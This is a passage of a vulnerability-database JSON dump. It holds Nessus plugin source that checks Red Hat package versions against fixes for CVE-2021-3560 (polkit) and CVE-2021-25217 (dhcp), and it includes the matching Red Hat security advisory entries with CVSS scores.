value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\", \"CVE-2021-25217\");\n script_xref(name:\"RHSA\", value:\"2021:2555\");\n script_xref(name:\"IAVB\", value:\"2021-B-0032-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.7.19 packages and (RHSA-2021:2555)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:2555 advisory.\n\n - dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or\n lease files in dhcpd and dhclient (CVE-2021-25217)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-25217\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1963258\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-cni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-kuryr-kubernetes\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/s390x/rhocp/4.7/debug',\n 'content/dist/layered/rhel8/s390x/rhocp/4.7/os',\n 'content/dist/layered/rhel8/s390x/rhocp/4.7/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhocp/4.7/debug',\n 'content/dist/layered/rhel8/x86_64/rhocp/4.7/os',\n 'content/dist/layered/rhel8/x86_64/rhocp/4.7/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'cri-o-1.20.3-6.rhaos4.7.git0d0f863.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'cri-o-1.20.3-6.rhaos4.7.git0d0f863.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'dhcp-client-4.3.6-41.el8_3.1', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'epoch':'12', 'exists_check':'openshift-hyperkube'},\n {'reference':'dhcp-common-4.3.6-41.el8_3.1', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'epoch':'12', 'exists_check':'openshift-hyperkube'},\n {'reference':'dhcp-libs-4.3.6-41.el8_3.1', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'epoch':'12', 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-4.7.0-202106252127.p0.git.8b4b094.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-4.7.0-202106252127.p0.git.8b4b094.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-redistributable-4.7.0-202106252127.p0.git.8b4b094.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-kuryr-cni-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-kuryr-common-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-kuryr-controller-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'polkit-0.115-11.el8_3.2', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'polkit-libs-0.115-11.el8_3.2', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'python3-kuryr-kubernetes-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/7/7Server/x86_64/ose/4.7/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/ose/4.7/os',\n 'content/dist/rhel/server/7/7Server/x86_64/ose/4.7/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/ose/4.7/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/ose/4.7/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/ose/4.7/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'cri-o-1.20.3-6.rhaos4.7.git0d0f863.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-4.7.0-202106252127.p0.git.8b4b094.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-redistributable-4.7.0-202106252127.p0.git.8b4b094.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'cri-o / dhcp-client / dhcp-common / dhcp-libs / openshift-clients / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:51", "description": "The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2021:2522 advisory.\n\n - hw: vt-d related privilege escalation (CVE-2020-24489)\n\n - glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n - kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-22T00:00:00", "type": "nessus", "title": "RHEL 8 : Red Hat Virtualization Host security update [ovirt-4.4.6] (Important) (RHSA-2021:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-24489", "CVE-2021-27219", "CVE-2021-3501", "CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:redhat-virtualization-host-image-update"], "id": "REDHAT-RHSA-2021-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/150950", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2522. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150950);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2020-24489\",\n \"CVE-2021-3501\",\n \"CVE-2021-3560\",\n \"CVE-2021-27219\"\n );\n script_xref(name:\"RHSA\", value:\"2021:2522\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : Red Hat Virtualization Host security update [ovirt-4.4.6] (Important) (RHSA-2021:2522)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:2522 advisory.\n\n - hw: vt-d related privilege escalation (CVE-2020-24489)\n\n - glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to\n 32 bits (CVE-2021-27219)\n\n - kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32\n GB from vcpu->run (CVE-2021-3501)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-24489\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-27219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2522\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1929858\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1950136\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1962650\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected redhat-virtualization-host-image-update package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-24489\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(190, 459, 787, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:redhat-virtualization-host-image-update\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'redhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_4', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'redhat-release-virtualization-host-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'redhat-virtualization-host-image-update');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2023-08-16T15:29:43", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:08", "type": "redhat", "title": "(RHSA-2021:2236) Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T09:50:56", "id": "RHSA-2021:2236", "href": "https://access.redhat.com/errata/RHSA-2021:2236", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:47", "type": "redhat", "title": "(RHSA-2021:2238) Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T10:41:51", "id": "RHSA-2021:2238", "href": "https://access.redhat.com/errata/RHSA-2021:2238", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:25", "type": "redhat", "title": "(RHSA-2021:2237) Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T10:41:46", "id": "RHSA-2021:2237", "href": "https://access.redhat.com/errata/RHSA-2021:2237", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.7.19. See the following advisory for the container images for this release:\n\nhttps://access.redhat.com/errata/RHSA-2021:2554\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient (CVE-2021-25217)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 